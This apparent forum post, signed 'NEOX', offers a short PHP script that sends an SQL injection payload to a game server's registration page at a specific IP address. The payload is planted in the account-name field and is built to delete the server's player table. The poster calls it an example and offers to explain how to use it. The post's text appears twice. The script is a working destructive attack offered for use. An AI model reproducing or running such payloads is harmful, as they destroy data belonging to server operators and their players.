hi
here is it:
almost on every server fixed,
use perl its more effectiv to sql inject ...
this is a example.
made by: NEOX .
if you are intressted I explain how to use.
SYNTEX-
here is it:
Code:
<?php
$sql = "foo'; DELETE KAL_DB.dbo.Player --";
$data = array(
'accname' => $sql,
'accpass1' => 'foobar',
'accpass2' => 'foobar',
'readrules' => true
);
$ch = curl_init("http://99.244.184.143/register.php");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POST,true);
curl_setopt($ch, CURLOPT_POSTFIELDS,$data);
curl_exec($ch);
curl_close($ch);
?>
use perl its more effectiv to sql inject ...
this is a example.
made by: NEOX .
if you are intressted I explain how to use.
SYNTEX-